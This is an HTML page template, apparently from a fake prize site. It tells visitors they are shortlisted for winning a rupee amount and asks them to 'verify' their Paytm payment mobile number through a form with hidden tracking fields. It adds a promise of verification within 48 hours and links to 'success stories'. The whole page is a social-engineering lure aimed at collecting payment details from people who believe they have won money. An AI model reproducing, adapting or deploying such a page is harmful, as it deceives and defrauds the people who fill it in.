<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>congratulations</title>
    <link rel="stylesheet" href="/static/css/sucess.css">
    <link rel='icon' href='/static/other/cash-fav.png' type='image/png' />
    <script defer src="/static/js/sucess.js"></script>
    <link href="/static/other/font-awesome-4.7.0/css/font-awesome.min.css" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/js-cookie@rc/dist/js.cookie.min.js"></script>
    <link rel="prerender" href="/successStories">
</head>

<body>
    <div class="cointainer " id="div-1">
        <div class="heading dataDiv" id="div-2">
            <h1 class="top textShadow" id="h1-1">Last step !!</h1>
            <h1 class="cost textShadow" id="h1-2">Varify your payment</h1>
            <h1 class="last textShadow" id="h1-3"> mobile number</h1>
            <h1 class="last textShadow light">(paytm) </h1>
            <h1 class="downArrow" id="h1-4">
                <i class="fa fa-hand-o-down" aria-hidden="true" id="i-1"></i>
            </h1>
        </div>

        <form id="form">
            <input type="hidden" id="id" name="id">
            <input type="hidden" id="platform" name="platform">
            <input type="number" name="mobile" id="mobile" placeholder="76-XXXX-XX12" required>
            <input type="submit" id="go" value="go">
        </form>

        <a class="successes dataDiv" href="/successStories">
            success stories...
        </a>

    </div>

    <div class="cointainer remove" id="div-1000">
        <div class="heading dataDiv" id="div-2">
            <h1 class="congra textShadow" id="h1-1">congratulations !!</h1>
            <h1 class="win textShadow" id="h1-2">you are shorted for wining ₹<span id="cost"></span></h1>
            <h1 class="remain textShadow" id="h1-3">you are in the prosess of varification with in 48 working hours we will check your credentials if any thing cause problem you will remove from the list you can still change your info by login again !! </h1>
            <h1 class="textShadow light">you will get a sms on your non-dnd number </h1>
        </div>

        <div class="headin ">
            <a href="/">
                bank to home page
            </a>
        </div>


        <a class="successes dataDiv" href="/successStories">
            success stories...
        </a>

    </div>



</body>

</html>
